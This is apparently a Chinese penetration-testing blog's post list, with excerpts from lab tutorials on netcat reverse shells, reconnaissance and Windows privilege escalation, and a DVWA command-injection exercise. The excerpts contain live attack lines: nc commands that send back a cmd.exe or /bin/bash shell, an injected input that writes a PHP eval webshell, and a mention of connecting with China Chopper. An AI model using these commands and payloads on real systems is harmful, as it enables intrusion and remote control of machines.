
渗透测试
安服那些事儿
渗透测试工程师希望多交流,谢谢关注
展开
-
反弹shell
Nc在物理机开启1234端口并监听,在cmd输入:nc.exe -lvvp 1234在被攻击者(windows)电脑cmd中输入:nc.exe 192.168.31.201 1234 -e cmd.exe在物理机就可以看到反弹过来的shell,也能执行命令如果用linux反弹shell,输入:nc 192.168.31.201 1234 -e /bin/bash在物理机也能看...原创 2019-11-05 19:40:45 · 316 阅读 · 0 评论 -
渗透方面的相关知识
1、信息收集whois查网站源IP,子网站,管理员个人信息,邮箱,联系方式,社工库爆破,cms框架信息,服务器版本信息2、提权(判断系统win linux)首先判断是什么系统,win2008 cmd命令systeminfo查看版本及补丁信息利用ms15-051漏洞序列号提权工具win2003 cmd命令systeminfo查看版本及补丁信息利用ms09-012漏洞序列号提权工具linu...原创 2019-10-22 09:06:49 · 616 阅读 · 0 评论 -
渗透测试 命令注入(代码注入)Dvwa-low
在输入框输入:8.8.8.8 && echo “<?php @eval($_REQUEST[666])?>”>2.php将一句话木马写入到E:\phpstudy\PHPTutorial\WWW\DVWA-master\vulnerabilities\exec下,形成一个2.php文件运行结果在文件中查看2.php 看到写入成功用中国菜刀连接,添加地址连接成功...原创 2019-10-11 23:17:55 · 648 阅读 · 0 评论 -
win2003 提权
win2003 提权win2003 提权##实验环境Win2003+vmware15Win2003作为目标机,在物理机浏览器访问192.168.41.131,看是否能访问到iss下的文件##访问已经上传好了的大马,并登录进去##在大马中使用cmd命令,查看whoami,显示为低权限##使用systeminfo查看补丁信息##为了提权,在大马中向目标机的回收站中上传提权.exe软件...原创 2019-10-11 16:34:58 · 575 阅读 · 0 评论